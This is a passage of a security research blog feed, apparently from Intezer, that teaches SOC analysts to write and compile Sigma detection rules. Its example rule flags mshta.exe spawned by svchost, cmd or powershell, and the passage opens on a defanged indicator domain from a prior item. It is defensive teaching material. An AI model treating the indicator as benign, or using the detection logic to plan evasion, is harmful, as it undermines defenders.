yourgroceries[.]top&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0"&gt;
&lt;button
class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
title="Copy code"
aria-label="Copy code"
data-copied-label="Copied!"
&gt;
&lt;div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;/button&gt;
&lt;/div&gt;
&lt;/div&gt;</description></item><item><title>SOC Level Up: Introduction to Sigma Rules</title><link>https://research.intezer.com/blog/2022/03/intro-to-sigma-rules/</link><pubDate>Tue, 22 Mar 2022 00:00:00 +0000</pubDate><guid>https://research.intezer.com/blog/2022/03/intro-to-sigma-rules/</guid><description>
&lt;p&gt;&lt;em&gt;Sigma rules are catching on more and more for SOC teams, as a way to write one
rule that can be used across multiple environments. By learning how Sigma rules
work and how to create them, you can take your SOC skills to the next level.&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Detecting security breaches inside an infrastructure is heavily based on
analyzing and monitoring events using logs. There are different types of logs,
aggregation systems, strategies and technologies that help SOC analysts in
their day to day job. While it&amp;rsquo;s excellent that there are a wide range of tools
SOC teams and organizations can implement in their security posture, it also
complicates the process of sharing information and knowledge within the
organization and the community – each SIEM has its own query syntax (or
language) and each log has it&amp;rsquo;s own unique fields.&lt;/p&gt;
&lt;p&gt;Often analysts create rules to detect active threats or attacks and
organizations would want to use them to alert upon a possible breach. For
example, we might have an excellent rule to detect the creation of a specific
malicious process and we want to share the rule with the community, partners,
or clients. Having said that, sharing detection rules for behavior is
complicated because each organization has its own way to digest logs,
infrastructure and tools, so it might be more challenging for them to
understand the rules and to integrate them into existing infrastructures.&lt;/p&gt;
&lt;p&gt;The solution is using Sigma rules. These rules are written in a well-defined
format using a markup language. Sigma is used for generating queries for
specific SIEMs and configurations. Using Sigma for writing detection rules
makes it easier to share and integrate them in the organization, regardless of
specific tools and logs that are used.&lt;/p&gt;
&lt;p&gt;In this blog we will introduce you to Sigma rules: What are Sigma rules? What
is the syntax of Sigma rules and what makes them a powerful tool that should be
used in your organization. We will present examples of how to write rules based
on analysis or real threats and explain the subtleties of writing these rules.
Once you get familiar with the format you will be able to understand the rules
and write them by yourself.&lt;/p&gt;
&lt;p&gt;This blog is the first part of a blog series in which we are going to present
key technologies and concepts that can be useful for SOC analysts who wish to
improve their skills and knowledge to do a better job in their current position
or to switch positions. In this series, we will introduce topics such as threat
intelligence.&lt;/p&gt;
&lt;h2&gt;What Are Sigma Rules?&lt;span class="hx:absolute hx:-mt-20" id="what-are-sigma-rules"&gt;&lt;/span&gt;
&lt;a href="#what-are-sigma-rules" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;Sigma is an &lt;a href="https://github.com/SigmaHQ/sigma"target="_blank" rel="noopener"&gt;open-source&lt;/a&gt; framework that
provides the ability to write rules to analyze logs – similar to YARA for files
or Snort for network analysis. Sigma rules are written using a predefined
syntax in YAML format, and then they are converted (using sigmac or
&lt;a href="https://uncoder.io/"target="_blank" rel="noopener"&gt;online converter&lt;/a&gt;) to a format that fits the target SIEM
or platform used in the organization. There are many supported targets such as:
Splunk, Elasticsearch, Microsoft Defender, and many more. Sigma can be used
with different log sources.&lt;/p&gt;
&lt;p&gt;The agility of Sigma rules and the fact that one rule can be used in
environments that use different configurations, makes it easier for analysts to
write these rules and share them with colleagues and the community.&lt;/p&gt;
&lt;p&gt;Sigma rules are a powerful tool that makes it easy to analyze different types
of logs and find specific action or threat. It can be used in two ways:&lt;/p&gt;
&lt;h3&gt;Identify and alert on suspicious activity&lt;span class="hx:absolute hx:-mt-20" id="identify-and-alert-on-suspicious-activity"&gt;&lt;/span&gt;
&lt;a href="#identify-and-alert-on-suspicious-activity" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;Sigma rules can be integrated into SIEM platforms and detect different events
as they happen thus helping to detect and stop them before any further damage.
For example we can create †rules to detect: unauthorized actions, web/resource
access, file modification, process creation and much more.&lt;/p&gt;
&lt;h3&gt;Threat Hunting&lt;span class="hx:absolute hx:-mt-20" id="threat-hunting"&gt;&lt;/span&gt;
&lt;a href="#threat-hunting" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;Sigma rules can be used to hunt for threats:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Use the rules to detect when a certain attack or threat targets your
organization.&lt;/li&gt;
&lt;li&gt;Check if your organization was breached by applying Sigma rules to old logs
(assuming your organization aggregates logs for at least a few months). Often
it
&lt;a href="https://www.upguard.com/blog/cost-of-data-breach#:~:text=In%202021%2C%20the,the%20damage%20costs."target="_blank" rel="noopener"&gt;takes an organization several months&lt;/a&gt;
before they discover that an attacker is already in the system. By analyzing
the logs for suspicious activity you increase the chances of discovering a
security breach and starting an incident response process sooner.&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Sigma Rules Syntax&lt;span class="hx:absolute hx:-mt-20" id="sigma-rules-syntax"&gt;&lt;/span&gt;
&lt;a href="#sigma-rules-syntax" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2022/03/intro-to-sigma-rules/images/fig1.png" title="Source: Sigma repo" alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Source: Sigma repo&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;The structure of Sigma rules is made of optional and mandatory parts as can be
seen in the picture above.&lt;/p&gt;
&lt;h3&gt;Metadata&lt;span class="hx:absolute hx:-mt-20" id="metadata"&gt;&lt;/span&gt;
&lt;a href="#metadata" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;These fields provide information about the rule and add informative comments
and notes. While it&amp;rsquo;s not mandatory, it is especially important to add this
information if you plan to share the rule with other people. There are a number
of fields that can be used here:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Title of the rule&lt;/li&gt;
&lt;li&gt;Author (optional)&lt;/li&gt;
&lt;li&gt;Date (optional)&lt;/li&gt;
&lt;li&gt;Unique ID (optional)&lt;/li&gt;
&lt;li&gt;License (optional) – it is recommended to add this field if you plan to share
the rule. By default the distribution is very strict, you can choose to
change it using &lt;a href="https://spdx.dev/ids/"target="_blank" rel="noopener"&gt;SPDX&lt;/a&gt; standard.&lt;/li&gt;
&lt;li&gt;Tag (optional) – For example, associate the rule with a technique from the
MITRE ATT&amp;amp;CK framework.&lt;/li&gt;
&lt;li&gt;Status (optional) – possible values can be experimental or test, to indicate
that the rule might need further tuning and testing.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Log Source&lt;span class="hx:absolute hx:-mt-20" id="log-source"&gt;&lt;/span&gt;
&lt;a href="#log-source" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;The log source section describes which logs should be searched and analyzed.
There are several optional fields that specify which type of logs are relevant
for the Sigma rule. While these fields are optional a rule should include at
least one of them as it provides vital information relevant to the detection
and will help the user of the rule integrate the rule in his infrastructure.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Category: specify the logs from a group of products. For example: firewall,
process_creation, file_event.&lt;/li&gt;
&lt;li&gt;Product: a specific software or service. For example: Windows, Apache, Zeek.&lt;/li&gt;
&lt;li&gt;Service: select subset from the product.&lt;/li&gt;
&lt;li&gt;Definition: a place for comments and additional information regarding the
log.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Detection&lt;span class="hx:absolute hx:-mt-20" id="detection"&gt;&lt;/span&gt;
&lt;a href="#detection" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;In this section, we define what we are looking for in the logs. This section
will contain one or more blocks usually called &lt;code&gt;selection&lt;/code&gt; or &lt;code&gt;filter&lt;/code&gt; but it
can have any other name. Each block will contain the relevant fields and
information that are needed for the detection of a specific event. When looking
for a match we can look for a specific string, event id, or a combination of
them, using the following fields and properties. Let&amp;rsquo;s look at the example
below:&lt;/p&gt;
&lt;p&gt;A rule to detect mshta execution where the process&amp;rsquo;s parent image ends with
&lt;code&gt;svchost.exe&lt;/code&gt; and the image of the process ends with &lt;code&gt;mshta.exe&lt;/code&gt;:&lt;/p&gt;
&lt;div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code"&gt;
&lt;div&gt;&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-yaml" data-lang="yaml"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nt"&gt;logsource&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nt"&gt;category&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="l"&gt;process_creation&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nt"&gt;product&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="l"&gt;windows&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt;&lt;/span&gt;&lt;span class="nt"&gt;detection&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nt"&gt;selection&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nt"&gt;ParentImage|endswith&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;- &lt;span class="s1"&gt;&amp;#39;svchost.exe&amp;#39;&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;- &lt;span class="s1"&gt;&amp;#39;cmd.exe&amp;#39;&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;- &lt;span class="s1"&gt;&amp;#39;powershell.exe&amp;#39;&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nt"&gt;Image|endswith&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;- &lt;span class="s1"&gt;&amp;#39;mshta.exe&amp;#39;&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nt"&gt;condition&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="l"&gt;selection&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0"&gt;
&lt;button
class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
title="Copy code"
aria-label="Copy code"
data-copied-label="Copied!"
&gt;
&lt;div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;/button&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p&gt;Based on what we learned from the previous section we know that this rule can
be used to scan logs of process creation on Windows OS.&lt;/p&gt;
&lt;p&gt;Next, there is a block called &lt;code&gt;selection&lt;/code&gt; which is a
&lt;a href="https://github.com/SigmaHQ/sigma/wiki/Specification#maps"target="_blank" rel="noopener"&gt;map&lt;/a&gt; (or directory)
that contains pairs of keys and values. In the example above there are two
keys: &lt;code&gt;ParentImage&lt;/code&gt; and &lt;code&gt;Image&lt;/code&gt;. The elements of the map are linked with
logical AND meaning we are looking for a match for both the image of the
process and its parent&amp;rsquo;s image.&lt;/p&gt;
&lt;p&gt;For the parent image the strings are in a
&lt;a href="https://github.com/SigmaHQ/sigma/wiki/Specification#lists"target="_blank" rel="noopener"&gt;list&lt;/a&gt; format – they
are linked with OR and we need at least 1 match in the end (because of
&lt;code&gt;endswith&lt;/code&gt;) of the path :&lt;code&gt;svchost.exe&lt;/code&gt;, &lt;code&gt;cmd.exe&lt;/code&gt; or &lt;code&gt;powershell.exe&lt;/code&gt;. In SIGMA
a string is:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Case insensitive.&lt;/li&gt;
&lt;li&gt;Can contain
&lt;a href="https://github.com/SigmaHQ/sigma/wiki/Specification#general"target="_blank" rel="noopener"&gt;regular expressions&lt;/a&gt;
(regex) – in this case it will be case sensitive.&lt;/li&gt;
&lt;li&gt;Wildcards can be used (* and ? ) in the detection. If needed these
characters can be escaped using the backslash.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Note that the value uses a modifier: &lt;code&gt;endswith&lt;/code&gt; – it specifies where the string
should be found; there are
&lt;a href="https://github.com/SigmaHQ/sigma/wiki/Specification#value-modifiers"target="_blank" rel="noopener"&gt;many other&lt;/a&gt;
modifiers that can be used. In the examples, the image of the process needs to
end with &lt;code&gt;mshta.exe&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;Lastly, the condition specifies which conditions have to be fulfilled in order
to identify an event and trigger an alert if needed. When a rule has several
sections they can be linked with different logical operations such as AND, OR,
NOT and &lt;a href="https://github.com/SigmaHQ/sigma/wiki/Specification"target="_blank" rel="noopener"&gt;more&lt;/a&gt;. We can use
the condition to create more detailed rules, filter out certain matches and
tune the rule to avoid false positives. In our example the detection will
happen when a log would contain the specified image paths.&lt;/p&gt;
&lt;h2&gt;Compiling Sigma Rules&lt;span class="hx:absolute hx:-mt-20" id="compiling-sigma-rules"&gt;&lt;/span&gt;
&lt;a href="#compiling-sigma-rules" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;After we write the rule we need to save the file and use sigmac (available in
the
&lt;a href="https://github.com/SigmaHQ/sigma/tree/0889a1fc3b1a950fab00a5334f1fef3cd8ba0cb2/tools"target="_blank" rel="noopener"&gt;repo&lt;/a&gt;)
to compile the rule. The command will look like this:&lt;/p&gt;
&lt;div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code"&gt;
&lt;div&gt;&lt;pre&gt;&lt;code&gt;./sigmac -t &amp;lt;target&amp;gt; -c &amp;lt;path to configuration file&amp;gt; &amp;lt;path to the rule&amp;gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0"&gt;
&lt;button
class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
title="Copy code"
aria-label="Copy code"
data-copied-label="Copied!"
&gt;
&lt;div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;/button&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p&gt;To compile a rule you must specify the target SIEM, provide a configuration
file and the path to the rule. Each argument is very significant for a
successful compilation of the rule and the integration of the rule in SIEM
systems. We will explain each argument in the command.&lt;/p&gt;
&lt;h3&gt;Target&lt;span class="hx:absolute hx:-mt-20" id="target"&gt;&lt;/span&gt;
&lt;a href="#target" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;Target is the SIEM or the system that will analyze the logs: it can be splunk,
stix, sysmon, etc. Each system has its own syntax so the output will differ.&lt;/p&gt;
&lt;p&gt;We will continue using our example for detecting mshta from the previous
section, let&amp;rsquo;s compile it for splunk:&lt;/p&gt;
&lt;div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code"&gt;
&lt;div&gt;&lt;pre&gt;&lt;code&gt;./sigmac -t splunk -c config/generic/windows-services.yml
sigma_rules/detect_mshta.yml
((ParentImage=&amp;#34;*\svchost.exe&amp;#34; OR ParentImage=&amp;#34;*cmd.exe&amp;#34; OR
ParentImage=&amp;#34;*powershell.exe&amp;#34;) (Image=&amp;#34;*\mshta.exe&amp;#34;))&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0"&gt;
&lt;button
class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
title="Copy code"
aria-label="Copy code"
data-copied-label="Copied!"
&gt;
&lt;div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;/button&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p&gt;And now for sqlite:&lt;/p&gt;
&lt;div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code"&gt;
&lt;div&gt;&lt;pre&gt;&lt;code&gt;./sigmac -t sqlite -c config/generic/windows-services.yml
sigma_rules/detect_mshta.yml
SELECT * FROM eventlog WHERE ((ParentImage LIKE &amp;#39;%\svchost.exe&amp;#39; ESCAPE &amp;#39;&amp;#39;
OR ParentImage LIKE &amp;#39;%cmd.exe&amp;#39; ESCAPE &amp;#39;&amp;#39; OR ParentImage LIKE
&amp;#39;%powershell.exe&amp;#39; ESCAPE &amp;#39;&amp;#39;) AND (Image LIKE &amp;#39;%\mshta.exe&amp;#39; ESCAPE &amp;#39;&amp;#39;))&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0"&gt;
&lt;button
class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
title="Copy code"
aria-label="Copy code"
data-copied-label="Copied!"
&gt;
&lt;div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;/button&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p&gt;We wrote one rule that can be easily integrated into two entirely different
environments and that&amp;rsquo;s the power of Sigma rules. You can run sigmac –list to
view the full list of supported targets.&lt;/p&gt;
&lt;h3&gt;Configuration File&lt;span class="hx:absolute hx:-mt-20" id="configuration-file"&gt;&lt;/span&gt;
&lt;a href="#configuration-file" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;Each environment and organization can use different log sources or index the
logs differently. To make Sigma rules relevant and usable in environments
regardless of the logs they use, Sigma relies on configuration files. A
configuration file contains the mapping of the logs and the fields that are
being used in the environment to the fields used in the rules. We can think of
it as a translation between the rule and our environment.&lt;/p&gt;
&lt;p&gt;Valid log source definition must contain at least one category, service or
product specification that exactly corresponds to the same fields in the rule&amp;rsquo;s
logsource section.&lt;/p&gt;
&lt;p&gt;Sigma Git repository contains many
&lt;a href="https://github.com/SigmaHQ/sigma/tree/0889a1fc3b1a950fab00a5334f1fef3cd8ba0cb2/tools/config"target="_blank" rel="noopener"&gt;configuration files&lt;/a&gt;
for the different log sources and SIEM systems. Note that in order to use the
configuration file in your environment you might need to modify it a bit and
adjust the mapping, but for a simple testing environment they should be good
enough.&lt;/p&gt;
&lt;p&gt;For example this is the output of our example rule when using windows-services
logs for splunk:&lt;/p&gt;
&lt;div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code"&gt;
&lt;div&gt;&lt;pre&gt;&lt;code&gt;./sigmac -t splunk -c config/generic/windows-services.yml
sigma_rules/detect_mshta.yml
((ParentImage=&amp;#34;*\svchost.exe&amp;#34; OR ParentImage=&amp;#34;*cmd.exe&amp;#34; OR
ParentImage=&amp;#34;*powershell.exe&amp;#34;) (Image=&amp;#34;*\mshta.exe&amp;#34;))&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0"&gt;
&lt;button
class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
title="Copy code"
aria-label="Copy code"
data-copied-label="Copied!"
&gt;
&lt;div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;/button&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p&gt;&lt;a href="https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon"target="_blank" rel="noopener"&gt;Sysmon&lt;/a&gt; is a
service that is part of sysinternals, it monitors and logs a wide range of
events and activities, the output can be viewed in the Windows event log
viewer. This is the output of the example rule for sysmon for splunk:&lt;/p&gt;
&lt;div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code"&gt;
&lt;div&gt;&lt;pre&gt;&lt;code&gt;./sigmac -t splunk -c config/generic/sysmon.yml
sigma_rules/detect_mshta.yml
(EventID=&amp;#34;1&amp;#34; (ParentImage=&amp;#34;*\svchost.exe&amp;#34; OR ParentImage=&amp;#34;*cmd.exe&amp;#34; OR
ParentImage=&amp;#34;*powershell.exe&amp;#34;) (Image=&amp;#34;*\mshta.exe&amp;#34;))&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0"&gt;
&lt;button
class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
title="Copy code"
aria-label="Copy code"
data-copied-label="Copied!"
&gt;
&lt;div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;/button&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p&gt;Let&amp;rsquo;s check the
&lt;a href="https://github.com/SigmaHQ/sigma/blob/0889a1fc3b1a950fab00a5334f1fef3cd8ba0cb2/tools/config/generic/sysmon.yml"target="_blank" rel="noopener"&gt;configuration&lt;/a&gt;
for Sysmon. Below is a snippet of the configuration:&lt;/p&gt;
&lt;div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code"&gt;
&lt;div&gt;&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-yaml" data-lang="yaml"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nt"&gt;logsources&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nt"&gt;process_creation&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nt"&gt;category&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="l"&gt;process_creation&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nt"&gt;product&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="l"&gt;windows&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nt"&gt;conditions&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nt"&gt;EventID&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="m"&gt;1&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nt"&gt;rewrite&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt;
